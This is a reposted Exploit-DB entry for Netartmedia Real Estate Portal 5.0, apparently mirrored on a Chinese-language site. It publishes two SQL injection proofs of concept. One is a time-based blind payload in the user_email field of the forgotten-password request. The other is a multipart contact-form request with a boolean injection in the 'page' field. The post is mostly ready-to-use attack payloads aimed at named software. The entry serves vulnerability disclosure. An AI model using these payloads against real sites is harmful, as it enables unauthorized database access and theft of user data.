Netartmedia Real Estate Portal 5.0 – SQL Injection

• Exploit Database
• 119 阅读

• 作者： Ahmet Ümit BAYRAM
  日期： 2019-03-19
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/46563/
• 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59

  # Exploit Title: Netartmedia Real Estate Portal 5.0 - Multiple SQL Injection # Date: 19.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://www.netartmedia.net/realestate/ # Demo Site: https://www.phpscriptdemos.com/realestate/ # Version: 5.0 # Tested on: Kali Linux # CVE: N/A # Description: The real estate portal software is made to be multi-language, the main site can show multiple languages and let the site visitors choose their preferred language.   ----- PoC 1: SQLi -----   Request: http://localhost/[PATH]/index.php Parameter: user_email (POST) Payload: ProceedSend=1&mod=forgotten_password&user_email=0'XOR(if(now()=sysdate(),sleep(0),0))XOR'Z' OR SLEEP(5)#   ----- PoC 2: SQLi -----   Request: http://localhost/[PATH]/index.php Parameter: MULTIPART page ((custom) POST Payload: ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="SubmitContact"   1 ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="code"   94102 ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="email"   sample@email.tst ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="message"   20 ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="name"   ${alpharand} ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="page"   en_Contact-2228' OR 3801=3801-- eISZ ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="phone"   555-666-0606 ------WebKitFormBoundaryYUBPFrrBhV4S4pf0 Content-Disposition: form-data; name="subject"   1 ------WebKitFormBoundaryYUBPFrrBhV4S4pf0--